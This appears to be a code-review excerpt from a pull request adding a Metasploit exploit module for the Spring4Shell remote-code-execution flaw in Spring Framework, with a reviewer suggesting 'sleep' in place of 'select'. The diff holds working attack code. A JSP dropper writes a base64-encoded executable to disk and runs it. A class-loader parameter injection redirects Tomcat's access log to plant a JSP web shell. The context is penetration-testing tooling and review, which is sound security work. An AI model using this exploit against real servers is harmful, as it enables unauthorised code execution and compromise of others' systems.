modules/exploits/multi/http/spring_framework_rce_spring4shell.rb

```diff
@@ -0,0 +1,289 @@
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Platform' => 'linux'
+            }
+          ],
+          [
+            'Windows',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Platform' => 'win'
+            }
+          ]
+        ],
+        'DisclosureDate' => '2022-03-31',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'AKA' => ['Spring4Shell', 'SpringShell'],
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('TARGETURI', [ true, 'The path to the application action', '/app/example/HelloWorld.action']),
+        OptString.new('PAYLOAD_PATH', [true, 'Path to write the payload', 'webapps/ROOT']),
+        OptString.new('FILEDROPPER_DIR', [ false, 'Path to write the filedropper (only applicable to non-Java targets)', '/tmp/']),
+      ]
+    )
+  end
+
+  def jsp_dropper(file, exe)
+    # The sun.misc.BASE64Decoder.decodeBuffer API is no longer available in Java 9.
+    dropper = <<~EOS
+      <%@ page import=\"java.io.FileOutputStream\" %>
+      <%@ page import=\"java.util.Base64\" %>
+      <%@ page import=\"java.io.File\" %>
+      <%#{' '}
+        FileOutputStream oFile = new FileOutputStream(\"#{file}\", false);
+        oFile.write(Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(exe)}\"));
+        oFile.flush();
+        oFile.close();
+        File f = new File(\"#{file}\");
+        f.setExecutable(true);
+        Runtime.getRuntime().exec(\"#{file}\");#{' '}
+      %>
+    EOS
+
+    dropper
+  end
+
+  def dump_line(uri, cmd = '')
+    res = send_request_cgi({
+      'uri' => uri + cmd,
+      'version' => '1.1',
+      'method' => 'GET'
+    })
+
+    res
+  end
+
+  def modify_class_loader(opts)
+    cl_prefix = 'class.module.classLoader'
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path.to_s),
+      'version' => '1.1',
+      'method' => 'POST',
+      'headers' => {
+        'c1' => '<%', # %{c1}i replacement in payload
+        'c2' => '%>' # %{c2}i replacement in payload
+      },
+      'vars_post' => {
+        "#{cl_prefix}.resources.context.parent.pipeline.first.pattern" => opts[:payload],
+        "#{cl_prefix}.resources.context.parent.pipeline.first.directory" => opts[:directory],
+        "#{cl_prefix}.resources.context.parent.pipeline.first.prefix" => opts[:prefix],
+        "#{cl_prefix}.resources.context.parent.pipeline.first.suffix" => opts[:suffix],
+        "#{cl_prefix}.resources.context.parent.pipeline.first.fileDateFormat" => opts[:file_date_format]
+      }
+    })
+
+    res
+  end
+
+  def check_log_file(_hint)
+    uri = normalize_uri('/', @jsp_file)
+
+    print_status("#{peer} - Waiting for the server to flush the logfile")
+
+    10.times do |x|
+      select(nil, nil, nil, 2)
```

Comment:
Should use the builtin `sleep` function here instead of select.

```suggestion
      sleep(2)
```